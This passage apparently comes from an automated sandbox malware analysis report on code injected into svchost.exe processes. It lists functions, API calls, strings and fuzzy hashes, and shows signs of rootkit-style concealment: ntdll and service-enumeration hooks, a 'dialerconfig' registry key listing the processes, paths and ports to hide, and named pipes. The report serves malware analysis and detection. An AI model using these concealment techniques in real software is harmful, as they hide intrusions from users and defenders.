Instruction Fuzzy Hash: 46F08231718BA092E707AB91F4406E573B1AB88B98F495027ED5D07F55CE78C9ADC700

Function 00000179537AD608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000179537AD631
TlsSetValue.KERNEL32 ref: 00000179537AD648

Strings

FlsSetValue, xrefs: 00000179537AD61E

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 9711712e3d408104b7a636f22671f09248094bbe1e46c96de628ba518baa1951
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: F5E06D71A1865091FA0A5B90F8247D52332AB897C8F494023DA1D06395EE38C9ADC710

Function 000001795377CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001795377CBC5

Strings

November, xrefs: 000001795377CBA8, 000001795377CBB2
October, xrefs: 000001795377CBBE

Memory Dump Source

Source File: 0000000C.00000002.2966408858.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953770000_svchost.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: d29161db2d5e58e77a19aeec2b0767fee3f9300d5dbd27e93e65991b3153c9da
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: C4E09231E0C65292FA179B52F4442E4A3B19B8974CF595123A61D06366CE38C89E8740

Function 0000017953D4D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000017953D4D631
TlsSetValue.KERNEL32 ref: 0000017953D4D648

Strings

FlsSetValue, xrefs: 0000017953D4D61E

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 910b5ec2379656de2447d9424a2381c348c3328b520d0130a964aae5f50a12af
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 96E0927120865091FB075BA0F8407E823B2BB88B88F494023D90D06B56CE78C96DC701

Function 00000179537A1D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000179537A1D9B
HeapAlloc.KERNEL32 ref: 00000179537A1DAA
GetProcessHeap.KERNEL32 ref: 00000179537A1E1E
HeapFree.KERNEL32 ref: 00000179537A1E2C

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 33a1b714b105d773c2c5a18b45ff3f86a857af4a48be75d1c83c01d21736f56c
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 01219532A18FA481FB128F59E40429AF3B4FB85B99F454116DE8C47B14FF78C58A8700

Function 0000017953D41D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000017953D41D9B
HeapAlloc.KERNEL32 ref: 0000017953D41DAA
GetProcessHeap.KERNEL32 ref: 0000017953D41E1E
HeapFree.KERNEL32 ref: 0000017953D41E2C

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 63ae50b773a4caa5d4831f2ee6b05969020ab05f2f178b6e4593734b678c3e6d
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: A7217736609BA486EB128F69F4042DAF3F0FB88B98F154126DE8D47B14FF78C55A8700

Function 0000017953D41274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000017953D4127A
HeapAlloc.KERNEL32 ref: 0000017953D41289
GetProcessHeap.KERNEL32 ref: 0000017953D412A3
HeapAlloc.KERNEL32 ref: 0000017953D412B4

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: b81e471515b737dd2ab1ebc591edad30e19392da5984ba902ea58f1ea3a0d485
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 6DE0397161161086E7068BB2E80478937F1EB88B05F488024CD0907750DF7D849DC740

Analysis Process: svchost.exePID: 696, Parent PID: 5796COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	68
Total number of Limit Nodes:	2

Executed Functions

Function 000002295D563458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000002295D56347A
PathFindFileNameW.SHLWAPI ref: 000002295D563489

Part of subcall function 000002295D563930: StrCmpNIW.SHLWAPI ref: 000002295D563948

Part of subcall function 000002295D563878: GetModuleHandleW.KERNEL32 ref: 000002295D563886
Part of subcall function 000002295D563878: GetCurrentProcess.KERNEL32 ref: 000002295D5638B4
Part of subcall function 000002295D563878: VirtualProtectEx.KERNEL32 ref: 000002295D5638D6
Part of subcall function 000002295D563878: GetCurrentProcess.KERNEL32 ref: 000002295D5638F4
Part of subcall function 000002295D563878: VirtualProtectEx.KERNEL32 ref: 000002295D563915

CreateThread.KERNEL32 ref: 000002295D5634D7

Part of subcall function 000002295D561EB4: GetCurrentThread.KERNEL32 ref: 000002295D561EBF

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 5fa08749519fdd083dd3e1f0d39032132afecf1b20116e9cc23eacd99de3edae
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: D8113C6171070271FB2797E9B50E7696294F794746FD80029FB168529CEF39C0EAC630

Function 000002295D561C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000002295D561650: GetProcessHeap.KERNEL32 ref: 000002295D56165B
Part of subcall function 000002295D561650: HeapAlloc.KERNEL32 ref: 000002295D56166A
Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D5616DA
Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D561707
Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D561721
Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D561741
Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D56175C
Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D56177C
Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D561797
Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D5617B7
Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D5617D2
Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D5617F2

Sleep.KERNEL32 ref: 000002295D561C43
SleepEx.KERNELBASE ref: 000002295D561C49

Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D56180D
Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D56182D
Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D561848
Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D561868
Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D561883
Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D5618A3
Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D5618BE
Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D5618C8

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 821f73ed8f2b7e9f5efbed1530173072f609ca8afc59f27a2d85262a82f8ebfe
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 7031EF65702601B1FE569FBEF64977A12A4AB44BC5FD44021EE09C769EEE14C8F2C270

Function 000002295D563930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 000002295D563948

Strings

dialer, xrefs: 000002295D563941

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: 6065884056ec97f2f48920713d01fdf3d33b039ec21e88ccf8d5ed595a0e7037
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: A2D0A76031120BA6FF16DFE9D8C92602350EB14754FC88020DB050211CD7188DEFCB30

Function 000002295D532908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000002295D532A31

Memory Dump Source

Source File: 0000000D.00000002.2967484419.000002295D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D530000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d530000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 58ff464dfdc6c4ecbc8e9b3855974d3a25b238110f5a3486ce761eece11ac661
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 0B610422701A91A7EE6ACF9DD45476CB391FF14B94FD48015EA1907789DB38D8E3C720

Non-executed Functions

Function 000002295D562CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000002295D562D80
lstrlenW.KERNEL32 ref: 000002295D562FBA

Part of subcall function 000002295D561A14: OpenProcess.KERNEL32 ref: 000002295D561A3A
Part of subcall function 000002295D561A14: K32GetModuleFileNameExW.KERNEL32 ref: 000002295D561A58
Part of subcall function 000002295D561A14: PathFindFileNameW.SHLWAPI ref: 000002295D561A67
Part of subcall function 000002295D561A14: lstrlenW.KERNEL32 ref: 000002295D561A73
Part of subcall function 000002295D561A14: StrCpyW.SHLWAPI ref: 000002295D561A86
Part of subcall function 000002295D561A14: CloseHandle.KERNEL32 ref: 000002295D561A94

GetProcAddress.KERNEL32 ref: 000002295D562D95

Part of subcall function 000002295D561554: StrCmpIW.SHLWAPI ref: 000002295D561585

Part of subcall function 000002295D563930: StrCmpNIW.SHLWAPI ref: 000002295D563948

StrCmpNIW.SHLWAPI ref: 000002295D562DD8
lstrlenW.KERNEL32 ref: 000002295D562F00

Strings

NtQueryObject, xrefs: 000002295D562D8B
ntdll.dll, xrefs: 000002295D562D79
\Device\Nsi, xrefs: 000002295D562DCB

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: f2a50276a7f58650b45cb133d784554c7d0c909d8cf186fa0b951f4959fe23cb
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: A6B1A032310690A1FB668FADE5487A9A3A4F744B94FD45026FE0953798EF35CCE2C360

Function 000002295D567E70 Relevance: 10.6, APIs: 7, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002295D567E8C
RtlCaptureContext.NTDLL ref: 000002295D567EB9
RtlLookupFunctionEntry.NTDLL ref: 000002295D567ED3
RtlVirtualUnwind.NTDLL ref: 000002295D567F14
IsDebuggerPresent.KERNEL32 ref: 000002295D567F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000002295D567F89
UnhandledExceptionFilter.KERNEL32 ref: 000002295D567F94

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: ec8428cfff50fd4698ec7a4d76673dc6833da7d9a6fe1aa8436e99a841b4a814
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 00317272304B80A5EB618FB4E8447DD7360F784754F84442AEB4D47B98EF38C599C720

Function 000002295D56B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002295D56B585
RtlLookupFunctionEntry.NTDLL ref: 000002295D56B59D
RtlVirtualUnwind.NTDLL ref: 000002295D56B5D8
IsDebuggerPresent.KERNEL32 ref: 000002295D56B611
SetUnhandledExceptionFilter.KERNEL32 ref: 000002295D56B61B
UnhandledExceptionFilter.KERNEL32 ref: 000002295D56B626

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 3032b272586a6c397c41cf937fc48523399078f95e56603a1cc937f571c125ad
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 26315F32314B8096EB61CF69E84439E73A4F788794F900116EB9D43BA8EF38C596CB10

Function 000002295D56FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002295D56FF67
WriteFile.KERNEL32 ref: 000002295D57021E
WriteFile.KERNEL32 ref: 000002295D570270
GetLastError.KERNEL32 ref: 000002295D570372
GetLastError.KERNEL32 ref: 000002295D5703D2

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 2ede8e80a4922f46ea2b94f1ca3103131468163758670aabf093de3d06320519
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: CEE1F132B14A80AAE712CFACD4882DD7BB1F3457D8FA44116EE4A57B9DDA34C4A7C710

Function 000002295D561650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002295D56165B
HeapAlloc.KERNEL32 ref: 000002295D56166A

Part of subcall function 000002295D561274: GetProcessHeap.KERNEL32 ref: 000002295D56127A
Part of subcall function 000002295D561274: HeapAlloc.KERNEL32 ref: 000002295D561289
Part of subcall function 000002295D561274: GetProcessHeap.KERNEL32 ref: 000002295D5612A3
Part of subcall function 000002295D561274: HeapAlloc.KERNEL32 ref: 000002295D5612B4

RegOpenKeyExW.ADVAPI32 ref: 000002295D5616DA
RegOpenKeyExW.ADVAPI32 ref: 000002295D561707
RegCloseKey.ADVAPI32 ref: 000002295D561721
RegOpenKeyExW.ADVAPI32 ref: 000002295D561741
RegCloseKey.ADVAPI32 ref: 000002295D56175C
RegOpenKeyExW.ADVAPI32 ref: 000002295D56177C
RegCloseKey.ADVAPI32 ref: 000002295D561797
RegOpenKeyExW.ADVAPI32 ref: 000002295D5617B7
RegCloseKey.ADVAPI32 ref: 000002295D5617D2
RegOpenKeyExW.ADVAPI32 ref: 000002295D5617F2
RegCloseKey.ADVAPI32 ref: 000002295D56180D
RegOpenKeyExW.ADVAPI32 ref: 000002295D56182D
RegCloseKey.ADVAPI32 ref: 000002295D561848
RegOpenKeyExW.ADVAPI32 ref: 000002295D561868
RegCloseKey.ADVAPI32 ref: 000002295D561883
RegOpenKeyExW.ADVAPI32 ref: 000002295D5618A3
RegCloseKey.ADVAPI32 ref: 000002295D5618BE
RegCloseKey.ADVAPI32 ref: 000002295D5618C8

Part of subcall function 000002295D5612C8: RegQueryInfoKeyW.ADVAPI32 ref: 000002295D561326
Part of subcall function 000002295D5612C8: GetProcessHeap.KERNEL32 ref: 000002295D561334
Part of subcall function 000002295D5612C8: HeapAlloc.KERNEL32 ref: 000002295D561345
Part of subcall function 000002295D5612C8: RegEnumValueW.ADVAPI32 ref: 000002295D5613A1
Part of subcall function 000002295D5612C8: GetProcessHeap.KERNEL32 ref: 000002295D5613E9
Part of subcall function 000002295D5612C8: HeapAlloc.KERNEL32 ref: 000002295D5613F7
Part of subcall function 000002295D5612C8: GetProcessHeap.KERNEL32 ref: 000002295D56141B
Part of subcall function 000002295D5612C8: HeapFree.KERNEL32 ref: 000002295D561429
Part of subcall function 000002295D5612C8: lstrlenW.KERNEL32 ref: 000002295D561432
Part of subcall function 000002295D5612C8: GetProcessHeap.KERNEL32 ref: 000002295D561440
Part of subcall function 000002295D5612C8: HeapAlloc.KERNEL32 ref: 000002295D56144E

Strings

pid, xrefs: 000002295D56173A
tcp_remote, xrefs: 000002295D561861
paths, xrefs: 000002295D5617B0
SOFTWARE\dialerconfig, xrefs: 000002295D5616BA
tcp_local, xrefs: 000002295D561826
process_names, xrefs: 000002295D561775
startup, xrefs: 000002295D5616FD
service_names, xrefs: 000002295D5617EB
udp, xrefs: 000002295D56189C

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 9694f6a56c70c1e61b2cb303acce30649b4cd8d78f3a5f68c02a3686739e7b9d
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 1F712D36311A50A6EF11DFAAE848AAD27B4F784BD9F801111EE4D47B2CEF34C4A6C310

Function 000002295D5612C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002295D561326
GetProcessHeap.KERNEL32 ref: 000002295D561334
HeapAlloc.KERNEL32 ref: 000002295D561345
RegEnumValueW.ADVAPI32 ref: 000002295D5613A1

Part of subcall function 000002295D561554: StrCmpIW.SHLWAPI ref: 000002295D561585

GetProcessHeap.KERNEL32 ref: 000002295D5613E9
HeapAlloc.KERNEL32 ref: 000002295D5613F7
GetProcessHeap.KERNEL32 ref: 000002295D56141B
HeapFree.KERNEL32 ref: 000002295D561429
lstrlenW.KERNEL32 ref: 000002295D561432
GetProcessHeap.KERNEL32 ref: 000002295D561440
HeapAlloc.KERNEL32 ref: 000002295D56144E
StrCpyW.SHLWAPI ref: 000002295D561470
GetProcessHeap.KERNEL32 ref: 000002295D561485
HeapFree.KERNEL32 ref: 000002295D561493

Strings

d, xrefs: 000002295D561365

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 9358fa33283ac00e48e3eef096d7c2d4eae6e59f5b07b3883fc98092d27cb8ea
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 50517C72315B44A6EB11CFAAE44879AB7A1F789BD0F948124EB5907B18DF38C0A6C710

Function 000002295D561EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000002295D561EBF

Part of subcall function 000002295D562174: GetModuleHandleA.KERNEL32 ref: 000002295D56218C
Part of subcall function 000002295D562174: GetProcAddress.KERNEL32 ref: 000002295D56219D

Part of subcall function 000002295D565C10: GetCurrentThreadId.KERNEL32 ref: 000002295D565C4B

Strings

NtResumeThread, xrefs: 000002295D561F02
NtDeviceIoControlFile, xrefs: 000002295D561FF6
NtEnumerateKey, xrefs: 000002295D561F59
NtQueryDirectoryFileEx, xrefs: 000002295D561F3C
NtQueryDirectoryFile, xrefs: 000002295D561F1F
NtEnumerateValueKey, xrefs: 000002295D561F76
ntdll.dll, xrefs: 000002295D561ECD
EnumServicesStatusExW, xrefs: 000002295D561FB1, 000002295D561FD2
NtQuerySystemInformation, xrefs: 000002295D561EE5
EnumServiceGroupW, xrefs: 000002295D561F90
sechost.dll, xrefs: 000002295D561FD9
advapi32.dll, xrefs: 000002295D561F97, 000002295D561FB8

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 8f0406c9d72b5bc1e1389ac32f2862628cca4651ba679a8cc03cb218467e707d
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 83318264714A4AB0FA0BEFECF85A6D42321A744384FE05523F51D161AD9E3882FBC3B0

Function 000002295D5623F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002295D562405
GetCurrentProcessId.KERNEL32 ref: 000002295D56240F

Part of subcall function 000002295D5619AC: OpenProcess.KERNEL32 ref: 000002295D5619CA
Part of subcall function 000002295D5619AC: IsWow64Process.KERNEL32 ref: 000002295D5619E0
Part of subcall function 000002295D5619AC: CloseHandle.KERNEL32 ref: 000002295D5619FB

CreateFileW.KERNEL32 ref: 000002295D562468
WriteFile.KERNEL32 ref: 000002295D562490
ReadFile.KERNEL32 ref: 000002295D5624AF
CloseHandle.KERNEL32 ref: 000002295D5624B8

Strings

\\.\pipe\dialerchildproc64, xrefs: 000002295D562438
\\.\pipe\dialerchildproc32, xrefs: 000002295D56243F

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 59b3c048340175dda705e04b33da8eef287338f84e38432b0e44bfee1e5aaebc
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 93213D36714B40A2FB11CB69F54835A63A0F389BE5FA04215EA5942BACDF3CC19ACB10

Function 000002295D56104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002295D5610AB
RegEnumValueW.ADVAPI32 ref: 000002295D56110E
GetProcessHeap.KERNEL32 ref: 000002295D561155
HeapAlloc.KERNEL32 ref: 000002295D561163
GetProcessHeap.KERNEL32 ref: 000002295D561187
HeapFree.KERNEL32 ref: 000002295D561195

Strings

d, xrefs: 000002295D5610CE

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
